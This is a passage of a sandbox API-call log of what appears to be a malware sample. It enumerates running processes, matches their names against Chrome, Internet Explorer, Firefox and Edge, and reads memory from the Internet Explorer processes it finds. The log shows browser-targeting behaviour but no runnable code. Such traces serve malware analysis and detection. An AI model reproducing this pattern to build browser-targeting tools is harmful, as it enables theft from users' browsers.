	[0251.455] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0251.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.456] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.456] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0251.457] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xa270
	[0251.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.457] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0251.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.457] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.458] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0251.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.458] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.458] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0251.459] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xa274
	[0251.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.459] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0251.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.460] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.460] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0251.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.460] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.461] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0251.461] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0251.462] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0251.462] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xa278
	[0251.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.462] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0251.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.463] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.464] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0251.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.464] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.465] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0251.466] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xa27c
	[0251.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.466] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0251.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.466] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.467] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0251.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.467] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.467] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0251.468] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xa280
	[0251.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.468] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0251.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.468] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.469] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0251.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.469] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.469] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0251.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xa284
	[0251.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.470] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0251.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.471] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.471] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0251.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.471] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.472] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0251.473] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xa288
	[0251.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.473] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0251.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.474] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.474] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0251.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.475] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.475] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0251.476] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xa28c
	[0251.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.476] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0251.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.476] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.477] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0251.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.477] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.477] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0251.478] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xa290
	[0251.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.478] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0251.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.479] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.479] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0251.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.480] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.480] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0251.481] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xa294
	[0251.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.481] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0251.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.481] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.482] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0251.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.482] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.483] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0251.483] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xa298
	[0251.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.484] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0251.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.484] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.484] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0251.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.485] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.485] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0251.486] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xa29c
	[0251.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.486] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0251.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.486] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.487] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0251.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.487] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.487] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0251.488] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xa2a0
	[0251.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.488] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0251.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.489] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.489] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0251.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.490] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.490] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0251.491] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xa2a4
	[0251.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.491] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0251.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.492] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.492] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0251.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.493] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.493] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0251.494] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xa2a8
	[0251.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.494] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0251.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.495] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.495] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0251.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.496] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.496] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0251.497] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xa2ac
	[0251.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.497] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0251.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.498] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.499] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0251.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.499] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.500] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0251.501] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xa2b0
	[0251.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.501] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0251.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.501] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.502] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0251.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.502] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.503] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0251.503] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xa2b4
	[0251.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.504] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0251.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.504] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0251.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.504] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0251.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.505] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.505] NtQueryInformationProcess (in: ProcessHandle=0xa2b4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0251.505] ReadProcessMemory (in: hProcess=0xa2b4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0251.505] ReadProcessMemory (in: hProcess=0xa2b4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0251.505] ReadProcessMemory (in: hProcess=0xa2b4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0251.505] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0251.506] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0251.506] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xa2b8
	[0251.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.506] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0251.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.507] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0251.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.507] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0251.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.507] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.508] NtQueryInformationProcess (in: ProcessHandle=0xa2b8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0251.508] ReadProcessMemory (in: hProcess=0xa2b8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0251.508] ReadProcessMemory (in: hProcess=0xa2b8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0251.508] ReadProcessMemory (in: hProcess=0xa2b8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0251.508] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0251.508] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0251.509] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xa2bc
	[0251.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.509] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0251.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.510] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.510] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0251.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.510] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.510] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0251.511] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xa2c0
	[0251.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.511] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0251.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.512] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.512] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0251.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.513] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.513] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.514] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xa2c4
	[0251.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.514] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.515] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.515] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.515] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
